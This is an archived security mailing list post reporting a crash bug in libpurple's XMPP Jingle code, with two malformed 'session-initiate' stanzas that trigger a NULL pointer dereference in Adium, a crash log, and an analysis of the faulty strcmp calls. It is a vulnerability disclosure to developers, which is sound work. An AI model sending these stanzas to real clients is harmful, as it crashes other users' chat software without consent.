Receipt of an invalid XMPP Jingle "session-initiate" iq missing certain fields causes libpurple to dereference a NULL pointer.

Thijs Alkemade thijs at adium.im
Sun Oct 23 17:49:17 EDT 2011 

Hello all,

Sending the following using the XML Console on XMPP in Adium 1.5hg to
another Adium 1.5hg client causes a crash:

---

<iq id='asdf' to='... at xnyhps.nl/...' type='set'>
  <jingle xmlns='urn:xmpp:jingle:1' action='session-initiate'
initiator='... at xnyhps.nl/...' sid='asdf'>
    <content creator='initiator' name='voice'>
      <description xmlns='urn:xmpp:jingle:apps:rtp:1'>
      </description>
      <transport xmlns='urn:xmpp:jingle:transports:ice-udp:1'>
      </transport>
    </content>
  </jingle>
</iq>

---

And so does:

---

<iq id='asdf' to='... at xnyhps.nl/...' type='set'>
  <jingle xmlns='urn:xmpp:jingle:1' action='session-initiate'
initiator='... at xnyhps.nl/...' sid='asdf'>
    <content name='voice'>
      <description xmlns='urn:xmpp:jingle:apps:rtp:1' media='audio'>
      </description>
      <transport xmlns='urn:xmpp:jingle:transports:ice-udp:1'>
      </transport>
    </content>
  </jingle>
</iq>

---

Relevant parts of the crash log:

---

Crashed Thread:  0  Dispatch queue: com.apple.main-thread

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000008

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib             	0x00007fff82e40870 strcmp + 80
1   libpurple                     	0x0000000100b87f57
jingle_rtp_parse_codecs + 50
2   libpurple                     	0x0000000100b88149
jingle_rtp_handle_action_internal + 163
3   libpurple                     	0x0000000100b83e89
jingle_handle_session_initiate + 123
4   libpurple                     	0x0000000100b83518
jabber_process_packet + 138
5   libpurple                     	0x0000000100b8d835
jabber_parser_element_end_libxml + 75
6   libxml2.2.dylib               	0x00007fff8b5a5d9f 0x7fff8b595000 + 69023
7   libxml2.2.dylib               	0x00007fff8b5b16f0 xmlParseChunk + 3276
8   libpurple                     	0x0000000100b8d6da
jabber_parser_process + 116
9   libpurple                     	0x0000000100b8301c jabber_recv_cb_ssl + 181

---

According to the spec
(http://xmpp.org/extensions/xep-0167.html#schema-content), a
"<description>" element is required to have a "media" attribute, but
that is missing here.
libpurple/protocols/jabber/jingle/rtp.c:jingle_rtp_parse_codecs()
checks with strcmp if the media attribute is "video" or "audio", but
that means it will crash if it is NULL. Also, "<content>" is required
to have a "creator", but excluding that also causes a similar crash
with strcmp in jingle_rtp_init_media().

I have encountered this bug with Adium 1.5hg, which currently uses
libpurple 2.10. I have no reason to assume it doesn't apply to Pidgin
2.10, but I have not been able to test this. There are more uses of
strcmp() in libpurple/protocols/jabber/jingle/rtp.c, but I have not
verified if those allow similar crashes. As Adium 1.4.3 (the latest
release) doesn't include VV, it won't be vulnerable to this bug (so
fixing this quickly is for us not a priority).

I hope I've given enough information, let me know if you need to know more.

Best regards,
Thijs Alkemade

More information about the security mailing list